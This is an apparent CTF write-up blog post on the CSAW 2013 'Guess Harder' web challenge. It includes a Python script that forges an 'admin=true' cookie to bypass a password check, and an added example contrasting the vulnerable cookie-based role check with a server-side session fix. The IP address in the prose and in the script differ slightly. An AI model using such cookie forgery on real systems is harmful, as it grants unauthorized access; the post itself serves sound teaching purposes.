VnutZ Domain
Copyright © 1996 - 2018 [Matthew Vea] - All Rights Reserved

2013-09-22

CSAW CTF 2013 - WEB 100 "Guess Harder"


So there's no way for anybody to play around with WEB100 "Guess Harder" after the fact since the challenge web server is shut down. The challenge provided an IP address - http://128.238.66.215 - which showed a short message to the effect of "HA! Bet you can't guess my password.", included a text box, and a submit button. When you guess wrong, the page just recycles.

Admittedly, I did this one the hard way at first by scripting a brute force routine with Python that cycled through all the entries of a password dictionary. That thing ran for a long time and produced nothing, so I finally opened up Wireshark to take a peek. Lo and behold, within the HTTP header was a field @COOKIE: admin=false@. Could it be that easy?

 
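import http.client
import urllib.parse

# The password value is a placeholder; the cookie is what changes.
params = urllib.parse.urlencode({'password': 'password'})
# Send admin=true in place of the admin=false seen in Wireshark.
# http.client appends the CRLF itself, so the value carries no "\r\n".
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": "admin=true"}
conn = http.client.HTTPConnection("128.238.66.225:80")
conn.request("POST", "/", params, headers)
response = conn.getresponse()
print(response.status, response.reason, response.read())
conn.close()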

Yup. Just telling the server @admin=true@ in the cookie field made it accept the entry and it provided the necessary flag.
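The flaw behind this result and one server-side fix, as an added example that is not code from the challenge or from this post: the vulnerable check reads the role from the client's cookie, while the hardened one stores the role on the server behind a random session token. The names `SESSIONS`, `login`, `verify_password` and `admins` are assumptions made for illustration, and the cookie headers in the demo are constructed.

```python
import secrets
from http.cookies import SimpleCookie

# Hypothetical server-side store: session token -> facts the server decided.
SESSIONS = {}


def is_admin_vulnerable(cookie_header):
    """The pattern from the write-up: the role comes from the client."""
    cookie = SimpleCookie(cookie_header)
    return "admin" in cookie and cookie["admin"].value == "true"


def login(username, password, verify_password, admins):
    """Create a session after a real credential check; return its token.

    verify_password is a caller-supplied function (assumption) that checks
    the password against a stored hash. The token would be sent back as
    'Set-Cookie: session=<token>; HttpOnly; Secure; SameSite=Strict'.
    """
    if not verify_password(username, password):
        return None
    token = secrets.token_urlsafe(32)  # unguessable, carries no meaning
    SESSIONS[token] = {"user": username, "admin": username in admins}
    return token


def is_admin_hardened(cookie_header):
    """The cookie only identifies a session; the role is looked up here."""
    cookie = SimpleCookie(cookie_header)
    if "session" not in cookie:
        return False
    session = SESSIONS.get(cookie["session"].value)
    return bool(session and session["admin"])


if __name__ == "__main__":
    # Constructed request headers, not captured traffic.
    forged = "admin=true"
    print("vulnerable check, forged cookie:", is_admin_vulnerable(forged))
    print("hardened check, forged cookie:  ", is_admin_hardened(forged))
    token = login("root", "s3cret", lambda u, p: p == "s3cret", {"root"})
    print("hardened check, real session:   ",
          is_admin_hardened("session=" + token))
```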


